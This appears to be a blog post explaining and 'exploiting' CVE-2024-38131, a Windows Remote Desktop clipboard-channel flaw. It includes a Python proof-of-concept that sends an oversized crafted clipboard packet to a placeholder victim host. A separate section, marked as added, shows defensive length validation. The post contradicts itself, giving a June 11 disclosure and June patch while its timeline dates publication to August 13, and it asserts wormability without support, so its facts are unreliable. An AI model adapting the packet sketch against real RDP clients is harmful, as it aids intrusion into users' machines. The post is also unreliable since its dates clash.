CVE-2024-38131 - Clipboard Virtual Channel Extension RCE Explained and Exploited
On June 11, 2024, Microsoft revealed a new critical vulnerability: CVE-2024-38131. This flaw, affecting Windows’ Remote Desktop Services, can let an attacker run their own code on your computer just by sending malicious clipboard content over the “Clipboard Virtual Channel Extension.” In this post, we’ll break down what happened, how it works, and even show a safe proof-of-concept, so you’ll know exactly why it matters.
What is the Clipboard Virtual Channel Extension?
The Clipboard Virtual Channel Extension (CLIPRDR) is what lets you copy and paste between your Remote Desktop (RDP) session and your personal computer. When you “copy” a file or text on your PC and “paste” in your RDP window (or vice versa), this channel moves the data between devices.
Where Did It Go Wrong?
The vulnerability is found in the way Windows processes certain clipboard messages. Specifically, the system does not properly validate clipboard data sent over the virtual channel. That means an attacker controlling one end of the RDP connection can craft clipboard messages with malicious payloads.
If a user connects to a *compromised/malicious* RDP server and leaves clipboard sharing enabled, the attacker can execute code on the client side—no user interaction besides connecting is required.
Original References
- Microsoft Security Update Guide - CVE-2024-38131
- NVD Entry for CVE-2024-38131
- Microsoft June 2024 Patch Tuesday Details (BleepingComputer)
Exploit Walkthrough
Let’s see how this exploit could work, using a safe, minimal reproduction. (We won’t use real shellcode, but will show the key steps.)
1. Forging a Malicious Clipboard Packet
Attackers can send crafted CLIPRDR_FORMAT_DATA_RESPONSE packets over the RDP channel. Here's the basic logic in Python to showcase the idea (the snippet below only builds the packet and writes it to a raw socket; a full RDP stack such as the RDPY library would be needed to deliver it inside a real session):
```python
import socket


def build_cliprdr_response(data):
    # Simulates a malformed clipboard packet that could trigger the overflow.
    # Header layout used here: msgType (2 bytes) + msgFlags (2 bytes) + dataLen (4 bytes, little-endian).
    packet_type = b'\x06\x00'    # CLIPRDR_FORMAT_DATA_RESPONSE
    packet_flags = b'\x02\x00'
    packet_length = len(data).to_bytes(4, 'little')
    return packet_type + packet_flags + packet_length + data


# Malicious clipboard data that causes an overflow or execution in the client.
evil_data = b'A' * 4096 + b'\xde\xad\xbe\xef'  # Overly large and crafted

# NOTE: this is a bare TCP socket, not an RDP session. The clipboard channel
# lives inside an established RDP connection, and in the scenario described
# above the attacker is the *server* that the victim's client connects to.
s = socket.socket()
s.connect(('victim_client_ip', 3389))  # placeholder host, as in the original sketch
payload = build_cliprdr_response(evil_data)
s.sendall(payload)
s.close()
```
Note: Real attacks would insert actual shellcode or a ROP chain instead of just “A”s.
2. What Happens Next? (The Danger Point)
The victim’s RDP client receives the packet, processes the clipboard data, and—if vulnerable—may execute the malicious code, handing total control over to the attacker.
- Instant access: Attacker executes arbitrary code without needing credentials.
- Wormable potential: If leveraged, can be used for automated lateral movement inside organizations—think ransomware.
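To make the "does not properly validate clipboard data" point concrete from the receiving side, here is an added example (not code from the original post and not Microsoft's implementation) that parses the 2+2+4 header the sketch above builds and shows the checks a receiver must apply before trusting the sender's dataLen. The size cap, the accepted flag set and the type/flag values are constructed assumptions for the example, not protocol constants.

```python
import struct
from typing import Optional, Tuple

# Assumed wire layout (same as the sketch above):
# msgType (uint16 LE) | msgFlags (uint16 LE) | dataLen (uint32 LE) | dataLen bytes of payload
HEADER = struct.Struct('<HHI')
MAX_CLIP_DATA = 64 * 1024            # constructed per-message cap for this example
KNOWN_FLAGS = {0x0000, 0x0001, 0x0002}  # constructed set of flag values the example accepts


class ClipboardPacketError(ValueError):
    """Raised when a clipboard message fails validation and must be dropped."""


def parse_unchecked(buf: bytes) -> Tuple[int, int, int]:
    """Trusts dataLen from the wire and hands it back unverified.
    A native receiver that sized a buffer or a copy from this value would be
    driven entirely by attacker-controlled input: the failure mode described above."""
    msg_type, msg_flags, data_len = HEADER.unpack_from(buf, 0)
    return msg_type, msg_flags, data_len


def parse_checked(buf: bytes) -> Tuple[int, int, bytes]:
    """Validates the header and the declared length before touching the payload."""
    if len(buf) < HEADER.size:
        raise ClipboardPacketError('truncated header')
    msg_type, msg_flags, data_len = HEADER.unpack_from(buf, 0)
    if msg_flags not in KNOWN_FLAGS:
        raise ClipboardPacketError(f'unexpected msgFlags 0x{msg_flags:04x}')
    if data_len > MAX_CLIP_DATA:
        raise ClipboardPacketError(f'dataLen {data_len} exceeds cap {MAX_CLIP_DATA}')
    actual = len(buf) - HEADER.size
    if actual != data_len:
        raise ClipboardPacketError(f'dataLen {data_len} does not match {actual} payload bytes')
    return msg_type, msg_flags, buf[HEADER.size:]


def build(msg_type: int, msg_flags: int, data: bytes, claimed_len: Optional[int] = None) -> bytes:
    """Builds a message; claimed_len lets a test deliberately lie about dataLen (constructed input)."""
    length = len(data) if claimed_len is None else claimed_len
    return HEADER.pack(msg_type, msg_flags, length) + data


def is_accepted(buf: bytes) -> bool:
    """True only if the checked parser would pass the message on to the clipboard code."""
    try:
        parse_checked(buf)
        return True
    except ClipboardPacketError:
        return False
```

The unchecked parser happily returns a 4 GiB dataLen for a three-byte message; the checked one drops it, along with truncated headers, unknown flags and anything over the cap.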
How to Protect Yourself
- Patch now! Microsoft’s June patches fix the flaw.
TL;DR
CVE-2024-38131 is a serious RDP bug—by sending bad clipboard data, hackers can run their own programs on your computer without you knowing. Update your systems ASAP, and always be careful what servers you RDP to and what features you enable.
Security isn’t just about strong passwords; it’s about making sure even the copy-paste features are locked down!
Stay Safe & Informed
For more, check the official Microsoft Advisory and keep your security tools updated.
Timeline
Published on: 08/13/2024 18:15:15 UTC
Last modified on: 10/16/2024 01:53:32 UTC